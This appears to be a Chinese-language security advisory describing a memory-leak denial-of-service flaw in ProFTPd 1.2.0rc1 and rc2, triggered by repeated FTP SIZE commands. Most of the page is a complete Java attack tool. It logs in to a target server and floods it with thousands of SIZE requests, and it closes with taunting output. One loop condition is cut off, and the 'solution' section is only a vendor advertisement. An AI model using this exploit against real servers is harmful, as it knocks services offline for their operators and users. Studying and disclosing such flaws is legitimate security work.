ProFTPd 远程拒绝服务漏洞 (APP,缺陷) :当 ProFTPd 执行 SIZE FTP 命令时会引起内存泄露漏洞。如果发送更多的SIZE 命令将引起拒绝服务攻击。以下是详细内容。
涉及程序:
ProFTPd
描述:
ProFTPd 内存泄露引起拒绝服务攻击
详细:
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。
当 ProFTPd 执行 SIZE FTP 命令时会引起内存泄露漏洞,如果发送大约5000次 SIZE FTP 命令到服务器中可能引起 ProFTPd 耗费超过300KB的内存。如果发送更多的SIZE 命令将引起拒绝服务攻击。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
- */
- import java.net.*;
- import java.io.*;
- class TCPconnection {
- public TCPconnection (String hostname, int portnumber) throws Exception {
- Socket s = doaSocket(hostname, portnumber);
- br = new BufferedReader (new InputStreamReader (s.getInputStream()));
- ps = new PrintStream (s.getOutputStream());
- }
- public String readLine() throws Exception {
- String s;
- try { s = br.readLine(); }
- catch (IOException ioe) {
- System.out.println("TCP Error ... it's a little hax0r exception ;-)");
- throw new Exception ("\nInput Error: I/O Error");
- }
- return s;
- }
- public void println(String s) {
- ps.println(s);
- }
- private Socket doaSocket(String hostname, int portnumber) throws Exception {
- Socket s = null;
- int attempts = 0;
- while (s == null && attempts
- try { s = new Socket(hostname, portnumber); }
- catch (UnknownHostException uhe) {
- System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
- throw new Exception("\nConnection Error: " + "unknown hostname");
- }
- catch (IOException ioe) {
- System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
- }
- attempts++;
- }
- if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
- else return s; }
- private final int maxattempts = 5;
- private BufferedReader br;
- private PrintStream ps;
- }
- class proftpDoS {
- public static void main(String[] arg) throws Exception {
- InputStreamReader isr;
- BufferedReader tcld;
- String hostnamez, username, password, file, s1, option;
- int i, j, k;
- isr = new InputStreamReader(System.in);
- tcld = new BufferedReader(isr);
- System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
- System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
- hostnamez = "";
- while (hostnamez.length()==0) {
- System.out.print("Please enter the hostname/IP: ");
- hostnamez = tcld.readLine(); }
- username = "";
- while (username.length()==0) {
- System.out.print("Enter the username: ");
- username = tcld.readLine(); }
- password = "";
- while (password.length()==0) {
- System.out.print("Enter the password for that username: ");
- password = tcld.readLine(); }
- file = "";
- while (file.length()==0) {
- System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
- file = tcld.readLine(); }
- System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
- System.out.println("1) Request 10000 size's to the server (it may be enough)");
- System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
- System.out.print("Option: ");
- option = tcld.readLine();
- k = Integer.parseInt(option);
- while (!(k==1 || k==2)) {
- System.out.print("Option not valid, please try again: ");
- option = tcld.readLine();
- k = Integer.parseInt(option); }
- TCPconnection tc = new TCPconnection(hostnamez, 21);
- tc.println("user " + username);
- tc.println("pass " + password);
- if (k==1) {
- for(i=0;i<10000;i++)
- tc.println("size " + file); }
- else if (k==2) {
- for(i=1;i<100;i++)
- for(j=2;j<((int)Math.pow(j,i ));j++)
- tc.println("size " + file); }
- tc.println("quit");
- s1 = tc.readLine();
- while (s1!=null) {
- s1 = tc.readLine();
- System.out.println("Attack completed ... as one of my friends says:");
- System.out.println("Hack just r0cks ;-)");
- }
- }
- }
受影响的系统:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
解决方案:
CNNS 为您提供完善的网络安全服务。
【编辑推荐】
